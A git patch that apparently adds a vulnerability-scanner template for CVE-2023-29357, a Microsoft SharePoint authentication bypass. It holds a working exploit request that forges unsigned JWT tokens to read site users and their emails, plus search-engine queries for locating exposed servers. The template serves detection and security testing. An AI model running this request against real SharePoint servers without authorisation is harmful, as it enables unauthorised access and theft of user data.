From fd690460973dd723ad16b7f4928d1b8c638ea698 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 29 Sep 2023 18:51:23 +0530
Subject: [PATCH 1/2] Added CVE-2023-29357 (Microsoft SharePoint -
 Authentication Bypass)

---
 http/cves/2023/CVE-2023-29357.yaml | 66 ++++++++++++++++++++++++++++++
 1 file changed, 66 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-29357.yaml

diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml
new file mode 100644
index 00000000000..d1ba80af7e8
--- /dev/null
+++ b/http/cves/2023/CVE-2023-29357.yaml
@@ -0,0 +1,66 @@
+id: CVE-2023-29357
+
+info:
+  name: Microsoft SharePoint - Authentication Bypass
+  author: pdteam
+  severity: critical
+  description: |
+    Microsoft SharePoint Server Elevation of Privilege Vulnerability
+  reference:
+    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29357
+    - https://srcincite.io/advisories/src-2020-0022/
+    - https://github.com/Chocapikk/CVE-2023-29357
+    - https://sec.vnpt.vn/2023/08/phan-tich-cve-2023-29357-microsoft-sharepoint-validatetokenissuer-authentication-bypass-vulnerability/
+    - https://starlabs.sg/blog/2023/09-sharepoint-pre-auth-rce-chain/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-29357
+    epss-score: 0.00267
+    epss-percentile: 0.63767
+    cpe: cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: microsoft
+    product: sharepoint_server
+    fofa-query: app="Microsoft-SharePoint"
+    shodan-query: http.headers_hash:-1968878704
+  tags: cve,cve2023,microsoft,sharepoint_server
+
+variables:
+  client_id: "00000003-0000-0ff1-ce00-000000000000"
+
+http:
+  - raw:
+      - |
+        GET /_api/web/siteusers HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer
+      - |
+        GET /_api/web/siteusers HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        Authorization: Bearer {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA
+        X-PROOF_TOKEN: {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA
+
+    extractors:
+      - type: regex
+        part: header
+        group: 1
+        name: realm
+        regex:
+          - realm="([^"]*)"
+        internal: true
+
+      - type: json
+        json:
+          - .value[].Email
+
+    matchers:
+      - type: word
+        words:
+          - LoginName
+          - Email
+          - IsSiteAdmin
+        condition: and

From ff450a65baf26ac7c25d8cebd5a130ec9f3ede4d Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 29 Sep 2023 19:04:39 +0530
Subject: [PATCH 2/2] strict matcher

---
 http/cves/2023/CVE-2023-29357.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml
index d1ba80af7e8..fcf079ce44b 100644
--- a/http/cves/2023/CVE-2023-29357.yaml
+++ b/http/cves/2023/CVE-2023-29357.yaml
@@ -59,6 +59,7 @@ http:
 
     matchers:
       - type: word
+        part: body_2
         words:
           - LoginName
           - Email